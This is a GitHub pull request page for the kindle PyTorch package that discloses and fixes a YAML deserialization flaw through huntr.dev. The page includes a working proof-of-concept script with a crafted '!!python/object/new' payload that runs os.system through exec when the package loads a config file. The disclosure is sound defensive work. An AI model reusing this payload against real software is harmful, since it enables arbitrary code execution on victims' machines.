search

JeiKeiLim / kindle

Making a PyTorch model easier than ever!
https://limjk.ai/kindle/
MIT License
78 stars 7 forks source link

Security Fix for Arbitrary Code Execution - huntr.dev #21

Closed huntr-helper closed 3 years ago

huntr-helper commented 3 years ago

@Anon-Artist (https://huntr.dev/users/Anon-Artist) has fixed a potential Arbitrary Code Execution vulnerability in your repository πŸ”¨. For more information, visit our website (https://huntr.dev/) or click the bounty URL below...

Q | A Version Affected | * Bug Fix | YES Original Pull Request | https://github.com/418sec/kindle/pull/1 Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/kindle/1/README.md

User Comments:

πŸ“Š Metadata *

Kindle is an easy model build package for PyTorch. Building a deep learning model became so simple that almost all model can be made by copy and paste from other existing model codes, which is vulnerable to Arbitary Code Execution.

Bounty URL: https://www.huntr.dev/bounties/1-pip-kindle

βš™οΈ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

πŸ’» Technical Description *

Fixed by avoiding unsafe loader.

πŸ› Proof of Concept (PoC) *

Installation

pip3 install kindle

Run exploit.py

import os
#os.sysem('pip3 install kindle')
from kindle.generator import custom_yaml_module
payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(payload)
custom_yaml_module.YamlModuleGenerator('config.yml')

kindle

xcalc will pop up.

πŸ”₯ Proof of Fix (PoF) *

After fix Arbitary Code execution will never happen.

πŸ‘ User Acceptance Testing (UAT)

After fix functionality is unaffected.

πŸ”— Relates to...

https://www.huntr.dev/bounties/1-pip-kindle

Anon-Artist commented 3 years ago

Why this fix is not merging @JeiKeiLim is there any issues Thanks

JeiKeiLim commented 3 years ago

Why this fix is not merging @JeiKeiLim is there any issues Thanks

Github Action is required to merge but I forgot to add PR trigger. I'm going to close and re-open this PR to see if GitHub Action runs.

JeiKeiLim commented 3 years ago

Why this fix is not merging @JeiKeiLim is there any issues Thanks

Github Action is required to merge but I forgot to add PR trigger. I'm going to close and re-open this PR to see if GitHub Action runs.

Github Action is running now. I will merge when it's done!

Anon-Artist commented 3 years ago

I hope everything will be okay thanks @JeiKeiLim

JeiKeiLim commented 3 years ago

I hope everything will be okay thanks @JeiKeiLim

Thank you for the PR!